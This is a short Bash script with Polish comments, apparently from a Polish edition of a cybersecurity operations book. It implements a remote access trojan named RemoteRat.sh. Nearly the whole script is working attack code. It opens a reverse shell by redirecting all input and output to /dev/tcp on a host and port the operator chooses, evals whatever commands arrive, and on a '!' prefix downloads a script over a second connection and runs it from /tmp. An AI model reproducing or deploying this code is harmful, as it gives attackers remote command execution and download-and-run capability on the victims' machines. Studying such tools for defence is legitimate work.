#!/bin/bash -
#
# Operacje cyberbezpieczeństwa w bashu
# RemoteRat.sh
#
# Opis:
# Narzędzie zdalnego dostępu, które będzie uruchamiane w systemie zdalnym; 
# zwykle przekazuje dane wejściowe do powłoki 
# ale jeśli przekażemy odpowiedni argument (znak !) pobiera i uruchamia skrypt 
#
# Użycie: RemoteRat.sh nazwahosta port1 [port2 [port3]]
# 


function cleanup ()
{
    rm -f $TMPFL
}

function runScript ()
{
    # informujemy, który skrypt jest potrzebny
    echo "$1" > /dev/tcp/${HOMEHOST}/${HOMEPORT2}     # <7>
    # wstrzymujemy działanie 
    sleep 1                                           # <8>
    if [[ $1 == 'exit' ]] ; then exit ; fi
    cat > $TMPFL </dev/tcp/${HOMEHOST}/${HOMEPORT3}   # <9>
    bash $TMPFL                                       # <10>
}

# -------------------  MAIN -------------------
# w tym miejscu warto sprawdzić, czy nie wystąpiły błędy 
HOMEHOST=$1
HOMEPORT=$2
HOMEPORT2=${3:-$((HOMEPORT+1))}
HOMEPORT3=${4:-$((HOMEPORT2+1))}

TMPFL="/tmp/$$.sh"
trap cleanup EXIT

# przesyłamy informację do swojego systemu:
exec  </dev/tcp/${HOMEHOST}/${HOMEPORT} 1>&0 2>&0     # <1>

while true
do
    echo -n '$ '                                      # <2>
    read -r                                           # <3>
    if [[ ${REPLY:0:1} == '!' ]]                      # <4>
    then
	# to jest skrypt
        FN=${REPLY:1}                                 # <5>
	runScript $FN
    else
	# zwykły przypadek - uruchamiamy polecenie
	eval "$REPLY"                                 # <6>
    fi
done

